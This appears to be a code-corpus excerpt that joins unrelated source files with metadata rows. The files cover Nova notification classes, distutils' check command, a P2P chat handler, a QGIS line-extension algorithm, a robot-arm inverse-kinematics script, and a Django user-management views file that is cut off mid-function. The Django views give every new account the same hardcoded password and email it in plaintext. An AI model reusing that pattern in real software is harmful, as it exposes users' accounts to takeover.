class InstanceActionResizePrepNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionResizePrepPayload')
}
@base.notification_sample('instance-snapshot-start.json')
@base.notification_sample('instance-snapshot-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionSnapshotNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionSnapshotPayload')
}
@base.notification_sample('instance-rescue-start.json')
@base.notification_sample('instance-rescue-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionRescueNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionRescuePayload')
}
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionSnapshotPayload(InstanceActionPayload):
# Version 1.6: Initial version. It starts at version 1.6 as
# instance.snapshot.start and .end notifications are switched
# from using InstanceActionPayload 1.5 to this new payload and
# also it added a new field so we wanted to keep the version
# number increasing to signal the change.
# Version 1.7: Added request_id field to InstancePayload
VERSION = '1.7'
fields = {
'snapshot_image_id': fields.UUIDField(),
}
def __init__(self, context, instance, fault, snapshot_image_id):
super(InstanceActionSnapshotPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.snapshot_image_id = snapshot_image_id
| apache-2.0 | -2,227,258,545,918,772,700 | 38.880763 | 79 | 0.673351 | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.2/Lib/distutils/command/check.py | 1 | 5369 | """distutils.command.check
Implements the Distutils 'check' command.
"""
__revision__ = "$Id: check.py 85197 2010-10-03 14:18:09Z tarek.ziade $"
from distutils.core import Command
from distutils.errors import DistutilsSetupError
try:
# docutils is installed
from docutils.utils import Reporter
from docutils.parsers.rst import Parser
from docutils import frontend
from docutils import nodes
from io import StringIO
class SilentReporter(Reporter):
def __init__(self, source, report_level, halt_level, stream=None,
debug=0, encoding='ascii', error_handler='replace'):
self.messages = []
Reporter.__init__(self, source, report_level, halt_level, stream,
debug, encoding, error_handler)
def system_message(self, level, message, *children, **kwargs):
self.messages.append((level, message, children, kwargs))
HAS_DOCUTILS = True
except Exception:
# Catch all exceptions because exceptions besides ImportError probably
# indicate that docutils is not ported to Py3k.
HAS_DOCUTILS = False
class check(Command):
"""This command checks the meta-data of the package.
"""
description = ("perform some checks on the package")
user_options = [('metadata', 'm', 'Verify meta-data'),
('restructuredtext', 'r',
('Checks if long string meta-data syntax '
'are reStructuredText-compliant')),
('strict', 's',
'Will exit with an error if a check fails')]
boolean_options = ['metadata', 'restructuredtext', 'strict']
def initialize_options(self):
"""Sets default values for options."""
self.restructuredtext = 0
self.metadata = 1
self.strict = 0
self._warnings = 0
def finalize_options(self):
pass
def warn(self, msg):
"""Counts the number of warnings that occurs."""
self._warnings += 1
return Command.warn(self, msg)
def run(self):
"""Runs the command."""
# perform the various tests
if self.metadata:
self.check_metadata()
if self.restructuredtext:
if HAS_DOCUTILS:
self.check_restructuredtext()
elif self.strict:
raise DistutilsSetupError('The docutils package is needed.')
# let's raise an error in strict mode, if we have at least
# one warning
if self.strict and self._warnings > 0:
raise DistutilsSetupError('Please correct your package.')
def check_metadata(self):
"""Ensures that all required elements of meta-data are supplied.
name, version, URL, (author and author_email) or
(maintainer and maintainer_email)).
Warns if any are missing.
"""
metadata = self.distribution.metadata
missing = []
for attr in ('name', 'version', 'url'):
if not (hasattr(metadata, attr) and getattr(metadata, attr)):
missing.append(attr)
if missing:
self.warn("missing required meta-data: %s" % ', '.join(missing))
if metadata.author:
if not metadata.author_email:
self.warn("missing meta-data: if 'author' supplied, " +
"'author_email' must be supplied too")
elif metadata.maintainer:
if not metadata.maintainer_email:
self.warn("missing meta-data: if 'maintainer' supplied, " +
"'maintainer_email' must be supplied too")
else:
self.warn("missing meta-data: either (author and author_email) " +
"or (maintainer and maintainer_email) " +
"must be supplied")
def check_restructuredtext(self):
"""Checks if the long string fields are reST-compliant."""
data = self.distribution.get_long_description()
for warning in self._check_rst_data(data):
line = warning[-1].get('line')
if line is None:
warning = warning[1]
else:
warning = '%s (line %s)' % (warning[1], line)
self.warn(warning)
def _check_rst_data(self, data):
"""Returns warnings when the provided data doesn't compile."""
source_path = StringIO()
parser = Parser()
settings = frontend.OptionParser().get_default_values()
settings.tab_width = 4
settings.pep_references = None
settings.rfc_references = None
reporter = SilentReporter(source_path,
settings.report_level,
settings.halt_level,
stream=settings.warning_stream,
debug=settings.debug,
encoding=settings.error_encoding,
error_handler=settings.error_encoding_error_handler)
document = nodes.document(settings, reporter, source=source_path)
document.note_source(source_path, -1)
try:
parser.parse(data, document)
except AttributeError:
reporter.messages.append((-1, 'Could not finish the parsing.',
'', {}))
return reporter.messages
| mit | -768,187,753,055,831,900 | 36.284722 | 78 | 0.575899 | false |
cbrunker/quip | lib/Handlers.py | 1 | 11422 | #
# Response handlers for P2P Server
#
import asyncio
import logging
from functools import partial
from hashlib import sha1, sha384
from uuid import uuid4
from os import path
from lib.Database import getFriendRequests, getSigningKeys, setUidMask, storeAuthority, setFriendAuth, getMessageKeys, \
setAddress, getFileRequests, storeFileRequest, delFileRequests, delFriendRequests, getFriendChecksum, \
updateFriendDetails, storeHistory
from lib.Utils import isValidUUID, sha1sum
from lib.Constants import BTRUE, BFALSE, WRITE_END, COMMAND_LENGTH, NONEXISTANT, PROFILE_VALUE_SEPARATOR, \
LIMIT_AVATAR_SIZE, MODIFIED_FILE
######################################
# Server Dispatch Coroutine Handlers
######################################
@asyncio.coroutine
def friendAcceptance(reader, writer, safe, profileId, data, requests=None):
"""
Handle incoming friend request acceptance (P2P)
Once a request has been made, and the destination user accepts, the destination user contacts the request user
who runs this coroutine to complete the friendship.
Requester->Server (quip client, friendRequest)
Server->Destination (Heartbeat token)
Destination->Server (quip client, getRequests)
Destination->Requester (p2p client, friendCompletion) to (p2p server, this coroutine)
@param reader: StreamReader object
@param writer: StreamWriter objet
@param safe: crypto box
@param profileId: profile ID of logged in user
@param data: uid followed by hash of message
@param requests: (Optional) Recent outgoing friend requests {uid: message hash}
@return: Auth token
"""
if not requests:
requests = {}
# auth token
auth = None
try:
# verify required input data length
assert len(data) == 76
# user id, message hash
mhash, uid = data[:-36], data[-36:]
# valid UUID
assert isValidUUID(uid) is True
except AssertionError:
logging.info("\t".join(("Invalid friend completion data received", "Data: {!r}".format(data))))
return b''.join((BFALSE, WRITE_END)), auth
if uid not in requests:
# check db for older requests
requests.update(getFriendRequests(safe, profileId))
# obtain request information for this user (uid)
try:
msg, timestamp, _, rowid = requests[uid]
except KeyError:
logging.warning("\t".join(("Friend Request Failure",
"No friend request found for given user ID", "UID: {!r}".format(uid))))
return b''.join((BFALSE, WRITE_END)), auth
# ensure our potential friend has the correct hash value for the friend request
try:
assert mhash.decode('ascii') == sha1(b''.join((uid, msg))).hexdigest()
except (UnicodeDecodeError, AssertionError):
logging.warning("\t".join(("Friend Request Failure", "Hash values do not match",
"Sent: {!r}".format(mhash),
"Local: {!r}".format(sha1(b''.join((uid, msg))).hexdigest()))))
return b''.join((BFALSE, WRITE_END)), auth
# hash value has matched, get public key
spub = getSigningKeys(safe, profileId)[1]
mpub = getMessageKeys(safe, profileId)[1]
# auth token sent to friend
token = bytes(str(uuid4()), encoding='ascii')
# create our auth token to be sent to server
auth = bytes(sha384(b''.join((uid, token))).hexdigest(), encoding='ascii')
# work out length of data
data = b''.join((token, spub, mpub))
# send length to read and auth token and public keys
writer.write(b''.join((bytes(str(len(data)), encoding='ascii'), WRITE_END, data)))
yield from writer.drain()
# recv back success to confirm storage of sent data by friend
success = yield from reader.readline()
try:
assert int(success[0]) == 49
int(success)
except (KeyError, ValueError):
logging.warning("\t".join(("Friend Request Warning",
"Friendship completion failed. Storage confirmation: {!r}".format(success))))
return b''.join((BFALSE, WRITE_END)), None
port = success[1:-1]
# receive length to read
data = yield from reader.readline()
try:
length = int(data)
except ValueError:
return b''.join((BFALSE, WRITE_END)), None
data = yield from reader.read(length)
fauth, spub, mpub = data[:36], data[36:100], data[100:]
try:
assert len(data) > 115
assert isValidUUID(fauth) is True
except AssertionError:
logging.error("\t".join(("Friend Request Failure",
"Invalid mask or public key provided", "Data: {!r}".format(data))))
return b''.join((BFALSE, WRITE_END)), None
# created and store localised mask of friend's true ID
fmask = setUidMask(safe, profileId, uid)
# store friend's auth mask
# (the mask we use when submitting authorised requests to the hub server regarding this friend)
setFriendAuth(safe, profileId, fmask, fauth, auth)
# store public key for friend
storeAuthority(safe, profileId, fmask, spub, mpub)
# store address locally
setAddress(safe, profileId, fmask,
b':'.join((bytes(writer.transport.get_extra_info('peername')[0], encoding='ascii'), port)))
# delete local friend request storage
delFriendRequests(rowid)
# True for success of all required friendship steps, hash of auth token we sent to friend (must be sent to hub server)
return BTRUE, auth
@asyncio.coroutine
def requestSendFile(safe, profileId, mask, data):
"""
Handle and store request for file transfer
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: local friend mask for given friend's user ID
@param data: filename, size, checksum seperated by VALUE_SEPERATOR and user ID
@return: user id, filename, size
"""
try:
filename, size, checksum = data[:-36].split(bytes(PROFILE_VALUE_SEPARATOR, encoding='utf-8'))
except ValueError:
logging.info("Invalid file request data recieved: {!r}".format(data))
return False
checksum = checksum[:-COMMAND_LENGTH]
# validate received data
try:
# sha1 hex length
assert len(checksum) == 40
# size in bytes must be integer
int(size)
except AssertionError:
logging.info("Invalid file request data received, checksum is not correct length: {!r}".format(checksum))
return False
except ValueError:
logging.info("Invalid file request data received, size is not an integer: {!r}".format(size))
return False
# store file transfer request
rowid = storeFileRequest(safe, profileId, outgoing=False, mask=mask, request=(filename, size, checksum))
return data[-36:], filename, size, checksum, rowid
@asyncio.coroutine
def sendFile(writer, safe, profileId, mask, checksum, expiry, blockSize=4098):
"""
Send file to from server to client destination
@param writer: StreamWriter object to client
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: local friend mask for given friend's user ID
@param checksum: sha1 sum value of file to be sent
@param expiry: expire days for file transfer requests (config set value)
@param blockSize: total number of bytes to read at once
@return: True when file if completely sent, otherwise False
"""
try:
# obtain current requests for provided mask and clear expired requests
filename, size, rowid = getFileRequests(safe, profileId, outgoing=True, mask=mask, expire=expiry)[mask][checksum]
except KeyError:
logging.warning("\t".join(("File Transfer Failed",
"File transfer request does not exist for mask {} and checksum {}".format(mask, checksum))))
writer.write(NONEXISTANT)
yield from writer.drain()
return False
if not path.isfile(filename):
delFileRequests(rowid)
logging.warning("\t".join(("File Transfer Failed", "File no longer exists: {}".format(filename))))
writer.write(NONEXISTANT)
yield from writer.drain()
return False
# match file checksum to ensure the same file which was to be sent
# has not been modified since the original transfer request
cursum = sha1sum(filename)
if checksum != cursum:
# remove invalid transfer request
delFileRequests(rowid)
logging.warning("\t".join(("File Transfer Failed", "File has been modified",
"Filename: {}".format(filename),
"Original checksum: {}".format(checksum),
"Current checksum: {}".format(cursum))))
writer.write(MODIFIED_FILE)
yield from writer.drain()
return False
blockSize = int(blockSize)
with open(filename, 'rb') as fd:
for buf in iter(partial(fd.read, blockSize), b''):
writer.write(buf)
yield from writer.drain()
# remove file transfer request from storage
delFileRequests(rowid)
return True
@asyncio.coroutine
def receiveAvatar(reader, writer, safe, profileId, mask, checksum):
"""
Receive avatar update check from friend
@param reader: client streamreader object
@param writer: streamwriter object
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: friend mask uid
@param checksum: avatar sha1 checksum
@return: '0' if avatar not updated, otherwise locally calculated checksum value of stored avatar
"""
if len(checksum) != 40:
logging.warning("Friend mask '{}' tried to send invalid checksum value: {!r}".format(mask, checksum))
return BFALSE
try:
checksum = checksum.decode('ascii')
except UnicodeDecodeError:
return BFALSE
# compare local checksum value
if checksum != getFriendChecksum(safe, profileId, mask):
writer.write(BTRUE)
yield from writer.drain()
else:
return BFALSE
# get size of avatar to read from friend
size = yield from reader.readline()
try:
size = int(size)
assert size < LIMIT_AVATAR_SIZE
except (ValueError, AssertionError):
logging.warning("Friend mask '{}' tried to send invalid avatar size value: {!r}".format(mask, size))
return BFALSE
writer.write(BTRUE)
yield from writer.drain()
# read avatar into memory
avatar = yield from reader.readexactly(size)
# store avatar
storedChecksum = updateFriendDetails(safe, profileId, mask, avatar=avatar)
# send locally calculated checksum value as verification of storage
return storedChecksum
@asyncio.coroutine
def receiveMessage(safe, profileId, mask, data):
"""
Process data as recieved message
@param data: bytes/bytestring of msg and uid sent by client
@return: (user id, received message) if receive message exists, else False
"""
# msg portion of data
msg = data[:-36 - COMMAND_LENGTH]
rowid = storeHistory(safe, profileId, mask, msg, fromFriend=True)
# uid, msg
return (rowid, data[-36:], msg) if msg else False
#######################
# P2P Client Handlers
#######################
@asyncio.coroutine
def inviteChat():
pass
| gpl-3.0 | 8,537,975,647,144,394,000 | 35.492013 | 127 | 0.651112 | false |
t-hey/QGIS-Original | python/plugins/processing/algs/qgis/ExtendLines.py | 1 | 2995 | # -*- coding: utf-8 -*-
"""
***************************************************************************
ExtendLines.py
--------------------
Date : October 2016
Copyright : (C) 2016 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'October 2016'
__copyright__ = '(C) 2016, Nyall Dawson'
# This will get replaced with a git SHA1 when you do a git archive323
__revision__ = '$Format:%H$'
from qgis.core import (QgsProcessingParameterNumber,
QgsProcessingException,
QgsProcessing)
from processing.algs.qgis.QgisAlgorithm import QgisFeatureBasedAlgorithm
class ExtendLines(QgisFeatureBasedAlgorithm):
START_DISTANCE = 'START_DISTANCE'
END_DISTANCE = 'END_DISTANCE'
def group(self):
return self.tr('Vector geometry')
def __init__(self):
super().__init__()
self.start_distance = None
self.end_distance = None
def initParameters(self, config=None):
self.addParameter(QgsProcessingParameterNumber(self.START_DISTANCE,
self.tr('Start distance'), defaultValue=0.0))
self.addParameter(QgsProcessingParameterNumber(self.END_DISTANCE,
self.tr('End distance'), defaultValue=0.0))
def name(self):
return 'extendlines'
def displayName(self):
return self.tr('Extend lines')
def outputName(self):
return self.tr('Extended')
def inputLayerTypes(self):
return [QgsProcessing.TypeVectorLine]
def prepareAlgorithm(self, parameters, context, feedback):
self.start_distance = self.parameterAsDouble(parameters, self.START_DISTANCE, context)
self.end_distance = self.parameterAsDouble(parameters, self.END_DISTANCE, context)
return True
def processFeature(self, feature, context, feedback):
input_geometry = feature.geometry()
if input_geometry:
output_geometry = input_geometry.extendLine(self.start_distance, self.end_distance)
if not output_geometry:
raise QgsProcessingException(
self.tr('Error calculating extended line'))
feature.setGeometry(output_geometry)
return feature
| gpl-2.0 | 7,437,769,807,170,386,000 | 36.4375 | 100 | 0.535225 | false |
studywolf/blog | InvKin/Arm.py | 1 | 7959 | '''
Copyright (C) 2013 Travis DeWolf
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import numpy as np
import scipy.optimize
class Arm3Link:
def __init__(self, q=None, q0=None, L=None):
"""Set up the basic parameters of the arm.
All lists are in order [shoulder, elbow, wrist].
q : np.array
the initial joint angles of the arm
q0 : np.array
the default (resting state) joint configuration
L : np.array
the arm segment lengths
"""
# initial joint angles
self.q = [.3, .3, 0] if q is None else q
# some default arm positions
self.q0 = np.array([np.pi/4, np.pi/4, np.pi/4]) if q0 is None else q0
# arm segment lengths
self.L = np.array([1, 1, 1]) if L is None else L
self.max_angles = [np.pi, np.pi, np.pi/4]
self.min_angles = [0, 0, -np.pi/4]
def get_xy(self, q=None):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
returns : list
the [x,y] position of the arm
"""
if q is None:
q = self.q
x = self.L[0]*np.cos(q[0]) + \
self.L[1]*np.cos(q[0]+q[1]) + \
self.L[2]*np.cos(np.sum(q))
y = self.L[0]*np.sin(q[0]) + \
self.L[1]*np.sin(q[0]+q[1]) + \
self.L[2]*np.sin(np.sum(q))
return [x, y]
def inv_kin(self, xy):
"""This is just a quick write up to find the inverse kinematics
for a 3-link arm, using the SciPy optimize package minimization
function.
Given an (x,y) position of the hand, return a set of joint angles (q)
using constraint based minimization, constraint is to match hand (x,y),
minimize the distance of each joint from it's default position (q0).
xy : tuple
the desired xy position of the arm
returns : list
the optimal [shoulder, elbow, wrist] angle configuration
"""
def distance_to_default(q, *args):
"""Objective function to minimize
Calculates the euclidean distance through joint space to the
default arm configuration. The weight list allows the penalty of
each joint being away from the resting position to be scaled
differently, such that the arm tries to stay closer to resting
state more for higher weighted joints than those with a lower
weight.
q : np.array
the list of current joint angles
returns : scalar
euclidean distance to the default arm position
"""
# weights found with trial and error,
# get some wrist bend, but not much
weight = [1, 1, 1.3]
return np.sqrt(np.sum([(qi - q0i)**2 * wi
for qi, q0i, wi in zip(q, self.q0, weight)]))
def x_constraint(q, xy):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
xy : np.array
current xy position (not used)
returns : np.array
the difference between current and desired x position
"""
x = (self.L[0]*np.cos(q[0]) + self.L[1]*np.cos(q[0]+q[1]) +
self.L[2]*np.cos(np.sum(q))) - xy[0]
return x
def y_constraint(q, xy):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
xy : np.array
current xy position (not used)
returns : np.array
the difference between current and desired y position
"""
y = (self.L[0]*np.sin(q[0]) + self.L[1]*np.sin(q[0]+q[1]) +
self.L[2]*np.sin(np.sum(q))) - xy[1]
return y
def joint_limits_upper_constraint(q, xy):
"""Used in the function minimization such that the output from
this function must be greater than 0 to be successfully passed.
q : np.array
the current joint angles
xy : np.array
current xy position (not used)
returns : np.array
all > 0 if constraint matched
"""
return self.max_angles - q
def joint_limits_lower_constraint(q, xy):
"""Used in the function minimization such that the output from
this function must be greater than 0 to be successfully passed.
q : np.array
the current joint angles
xy : np.array
current xy position (not used)
returns : np.array
all > 0 if constraint matched
"""
return q - self.min_angles
return scipy.optimize.fmin_slsqp(
func=distance_to_default,
x0=self.q,
eqcons=[x_constraint,
y_constraint],
# uncomment to add in min / max angles for the joints
# ieqcons=[joint_limits_upper_constraint,
# joint_limits_lower_constraint],
args=(xy,),
iprint=0) # iprint=0 suppresses output
def test():
# ###########Test it!##################
arm = Arm3Link()
# set of desired (x,y) hand positions
x = np.arange(-.75, .75, .05)
y = np.arange(.25, .75, .05)
# threshold for printing out information, to find trouble spots
thresh = .025
count = 0
total_error = 0
# test it across the range of specified x and y values
for xi in range(len(x)):
for yi in range(len(y)):
# test the inv_kin function on a range of different targets
xy = [x[xi], y[yi]]
# run the inv_kin function, get the optimal joint angles
q = arm.inv_kin(xy=xy)
# find the (x,y) position of the hand given these angles
actual_xy = arm.get_xy(q)
# calculate the root squared error
error = np.sqrt(np.sum((np.array(xy) - np.array(actual_xy))**2))
# total the error
total_error += np.nan_to_num(error)
# if the error was high, print out more information
if np.sum(error) > thresh:
print('-------------------------')
print('Initial joint angles', arm.q)
print('Final joint angles: ', q)
print('Desired hand position: ', xy)
print('Actual hand position: ', actual_xy)
print('Error: ', error)
print('-------------------------')
count += 1
print('\n---------Results---------')
print('Total number of trials: ', count)
print('Total error: ', total_error)
print('-------------------------')
if __name__ == '__main__':
test()
| gpl-3.0 | 4,691,724,446,632,460,000 | 34.373333 | 79 | 0.547305 | false |
Mansilla1/Sistema-SEC | apps/usuarios/views.py | 1 | 14404 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Código desarrollado por Daniel Mansilla
from django.shortcuts import render, render_to_response, redirect
from django.views.generic import ListView, CreateView, DetailView, DeleteView, UpdateView, TemplateView
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseBadRequest
from django.core.urlresolvers import reverse_lazy
from django.core import serializers
from django.contrib.auth.models import User
from django.contrib.auth import login, logout
from django.utils import timezone
from django.template import RequestContext
# import django_excel as excel
from django.contrib import messages
from django.core.mail import send_mail
from django.conf import settings
import openpyxl
from openpyxl import Workbook
from openpyxl.styles import Font
from io import BytesIO
from Proyecto.utilities import generate_pdf
from random import randrange, uniform
import random
import requests
import ast
from django.db.models import Count
# from django.utils import simplejson
# import simplejson
from .forms import *
from .models import *
def login_user(request):
template_name = 'login/login.html'
logout(request)
username = password = ''
request.session['token'] = None
if request.POST:
post_data = {'username': request.POST["username"],'password':request.POST["password"]}
response = requests.post('http://cubesoa.asuscomm.com:90/rest-auth/login/', data=post_data)
content = response.content
content = ast.literal_eval(content)
if "key" in content:
post_data2 = {'username': str(request.POST["username"])}
header = {'Content-Type':'application/json','Authorization':'Token ' + content['key']}
response2 = requests.get('http://cubesoa.asuscomm.com:90/rest-auth/user/',headers=header, data=post_data2)
content2 = response2.content
content2 = ast.literal_eval(content2)
request.session["pk"] = content2['pk']
request.session["first_name"] = content2['first_name']
request.session["last_name"] = content2['last_name']
request.session["email"] = content2['email']
request.session["token"] = content['key']
return HttpResponseRedirect(reverse_lazy('inicio'))
# elif
# return redirect('inicio')
return render(request, template_name, {})
# def index(request):
# # perfil_user = PerfilUsuario.objects.get(user__id=request.user.id)
# # usuarios = PerfilUsuario.objects.all().count()
# # contenidos = ProfeSesion.objects.filter(status=True).count()
# # preguntas = Pregunta.objects.filter(status=True).count()
# # evaluaciones = Evaluacion.objects.filter(disponible=True).count()
# # usuario_registrados = PerfilUsuario.objects.all().order_by('created_at')[:5].reverse()
# # ------------------------------------------
# # OBTENER RANKINGS
# # ------------------------------------------
# user_pregunta = User.objects.exclude(perfilusuario__tipo_usuario='Estudiante').annotate(preguntas=Count('pregunta')).order_by('-preguntas')[:5]
# user_evaluacion = User.objects.exclude(perfilusuario__tipo_usuario='Estudiante').annotate(evaluaciones=Count('evaluacion')).order_by('-evaluaciones')[:5]
# orden_preguntas = Pregunta.objects.all().order_by('-cant_usada')[:5]
# context = {
# 'user_pregunta': user_pregunta,
# 'user_evaluacion': user_evaluacion,
# 'orden_preguntas': orden_preguntas,
# # 'perfil_user': perfil_user,
# # 'usuarios': usuarios,
# # 'preguntas': preguntas,
# # 'contenidos': contenidos,
# # 'evaluaciones': evaluaciones,
# # 'usuario_registrados': usuario_registrados,
# }
# return render(request, 'index.html', context)
def usuarioList(request):
usuario = PerfilUsuario.objects.all()
context = {
'usuario': usuario,
}
return render(request, 'apps/usuarios/usuario_list.html', context)
def usuarioCreate(request):
if request.POST:
form = PerfilForm(request.POST)
form2 = RegistroForm(request.POST)
if form.is_valid() and form2.is_valid():
form2 = form2.save(commit=False)
form2.save()
form = form.save(commit=False)
form.user = form2
form.save()
#Obtener el nombre de usuario
user=form2.username
nombre = form.nombres + ' ' +form.apellido1 + ' ' +form.apellido2
contrasena = 'unab2020'
correo = form.email
tipouser = form.tipo_usuario
subject = 'Bienvenido al Portal SEC!'
message = 'Hola %s!\nusuario: %s, password: %s' % (nombre, user, contrasena)
send_mail(
subject,
message,
settings.EMAIL_HOST_USER,
[correo],
fail_silently=False,
)
return redirect('usuarios:listar')
else:
form = PerfilForm()
form2 = RegistroForm()
context = {
'form': form,
'form2': form2,
}
return render(request, 'apps/usuarios/usuario_create.html', context)
def usuarioUpdate(request, usuario_id):
# usuario = User.objects.get(id=usuario_id)
# id_user = int(usuario.id)
perfil = PerfilUsuario.objects.get(user=usuario_id)
if request.method == 'GET':
# form = RegistroForm(instance=usuario)
form = PerfilForm(instance=perfil)
else:
# form = RegistroForm(request.POST, instance=usuario)
form = PerfilForm(request.POST, instance=perfil)
if form.is_valid():
form.save()
# form2 = form2.save(commit=False)
# form2.user = usuario
# form2.save()
return redirect('usuarios:listar')
context = {
'form': form,
# 'form2': form2,
'perfil': perfil,
}
return render(request, 'apps/usuarios/usuario_update.html', context)
# class UsuarioDetail(DetailView):
# model = PerfilUsuario
# template_name = 'apps/usuarios/usuario_detail.html'
# context_object_name = 'usuario'
# def get_context_data(self, **kwargs):
# context = super(UsuarioDetail, self).get_context_data(**kwargs)
# context['title'] = 'Detalle de usuario'
# return context
def usuarioDelete(request, usuario_id):
usuario = User.objects.get(id=usuario_id)
if request.method == 'POST':
usuario.delete()
return redirect('usuarios:listar')
return render(request, 'apps/usuarios/usuario_delete.html', {'usuario':usuario})
#Planillas excel
def get_planilla_usuario(request):
#generar excel
wb = Workbook()
# ws = wb.create_sheet("Calificaciones",0)
ws = wb.active
ws.title = 'Usuarios'
# ws.font = ws.font.copy(bold=True, italic=True)
# Cabeceras
a1 = ws.cell(row=1, column=1, value='RUN')
a2 = ws.cell(row=1, column=2, value='Nombres')
a3 = ws.cell(row=1, column=3, value='Apellido Paterno')
a4 = ws.cell(row=1, column=4, value='Apellido Materno')
a5 = ws.cell(row=1, column=5, value='Email')
a6 = ws.cell(row=1, column=6, value='Usuario')
a7 = ws.cell(row=1, column=7, value='Tipo Usuario')
# a7 = ws.cell(row=1, column=7, value='¿Coordinador de asignatura? (si/no)')
a1.font = Font(bold=True)
a2.font = Font(bold=True)
a3.font = Font(bold=True)
a4.font = Font(bold=True)
a5.font = Font(bold=True)
a6.font = Font(bold=True)
a7.font = Font(bold=True)
nombre_archivo = 'Planilla_usuarios.xlsx'
response = HttpResponse(content_type="application/ms-excel")
contenido = "attachment; filename={0}".format(nombre_archivo)
response["Content-Disposition"] = contenido
wb.save(response)
return response
def upload(request):
if request.POST:
# iniciar excel
excel = request.FILES['archivo'].read() # capturar archivo
wb = openpyxl.load_workbook(filename=BytesIO(excel)) # iniciar archivo
hojas = wb.get_sheet_names() # capturar nombre de hojas del archivo
hoja = wb.get_sheet_by_name(hojas[0]) #utilizar la primera hoja del documento
total_filas = hoja.max_row # capturar valor maximo de filas a leer
total_columnas = hoja.max_column # capturar valor maximo de columnas
user_no_register = []
#loop de lectura y escritura
for i in range(2, total_filas+1):
form = PerfilForm() #formulario de perfil usuario
form2 = RegistroForm(request.POST or None) # formulario registro usuario
# form3 = ProfesorForm()
# form3_2 = CoordinadorForm()
# form4 = EstudianteForm()
#probar existencia de usuario
username = hoja.cell(row=i,column=6).value
print username
try:
usuario = User.objects.get(username=username)
usuario = usuario.username
print 'usuario ya existe'
user_no_register += [usuario]
except:
rut = hoja.cell(row=i,column=1).value
nombre = hoja.cell(row=i,column=2).value
apellido1 = hoja.cell(row=i,column=3).value
apellido2 = hoja.cell(row=i,column=4).value
correo = hoja.cell(row=i,column=5).value
usuario = hoja.cell(row=i,column=6).value
tipo_usuario = hoja.cell(row=i,column=7).value
nombre = nombre.capitalize()
apellido1 = apellido1.capitalize()
apellido2 = apellido2.capitalize()
tipo_usuario = tipo_usuario.capitalize()
if tipo_usuario == 'Comité académico' or tipo_usuario == 'Comite académico' or tipo_usuario == 'Comité academico':
tipo_usuario = 'Comite academico'
print tipo_usuario
# numero_random = randrange(100,999)
# contrasena = "%s%s%s%s" % (nombre[0].capitalize(),numero_random, apellido[:2], numero_random)
contrasena = "unab2020"
# form2.set_password(self.cleaned_data["password1"])
# form2.set_password(self.cleaned_data["password2"])
form2 = form2.save(commit=False)
form2.username = usuario
# form2.first_name = nombre
# form2.last_name = apellido
# form2.email = correo
form2.password1 = contrasena
form2.password2 = contrasena
form2.save()
form = form.save(commit=False)
form.rut = rut
form.nombres = nombre
form.apellido1 = apellido1
form.apellido2 = apellido2
form.email = correo
form.tipo_usuario = tipo_usuario
form.user = form2
form.save()
# if form.tipo_usuario == 'Docente':
# form3 = form3.save(commit=False)
# form3.usuario = form
# form3.save()
# # if coordinador=='si' or coordinador=='SI' or coordinador=='Si' or coordinador=='sI':
# # form3_2 = form3_2.save(commit=False)
# # form3_2.profesor = form
# # form3_2.save()
# elif form.tipo_usuario == 'Estudiante':
# form4 = form4.save(commit=False)
# form4.usuario = form
# form4.save()
#Obtener el nombre de usuario
user =form2.username
nombre = "%s %s %s" %(form.nombres, form.apellido1, form.apellido2)
correo = form.email
tipouser = form.tipo_usuario
subject = 'Bienvenido al Portal SEC!'
message = 'usuario: %s, password %s' % (user, contrasena)
send_mail(
subject,
message,
settings.EMAIL_HOST_USER,
[correo],
fail_silently=False,
)
print user_no_register
return redirect('usuarios:listar')
else:
form = PerfilForm()
form2 = RegistroForm()
# form3 = ProfesorForm()
# # form3_2 = CoordinadorForm()
# form4 = EstudianteForm()
context = {
'form': form,
'form2': form2,
# 'form3': form3,
# # 'form3_2': form3_2,
# 'form4': form4,
}
return render(request, 'apps/usuarios/usuario_upload.html', context)
# ESTUDIANTES
def estudiante_list(request):
estudiantes = Estudiante.objects.all()
return render(request, 'apps/usuarios/estudiantes_list.html', {'estudiantes': estudiantes})
def estudiante_create(request):
if request.POST:
form = EstudianteForm(request.POST)
if form.is_valid():
form.save()
return redirect('usuarios:listar_estudiantes')
else:
form = EstudianteForm()
context = {'form': form}
return render(request, 'apps/usuarios/estudiante_create.html', context)
def upload_estudiante(request):
if request.POST:
# iniciar excel
excel = request.FILES['archivo'].read() # capturar archivo
wb = openpyxl.load_workbook(filename=BytesIO(excel)) # iniciar archivo
hojas = wb.get_sheet_names() # capturar nombre de hojas del archivo
hoja = wb.get_sheet_by_name(hojas[0]) #utilizar la primera hoja del documento
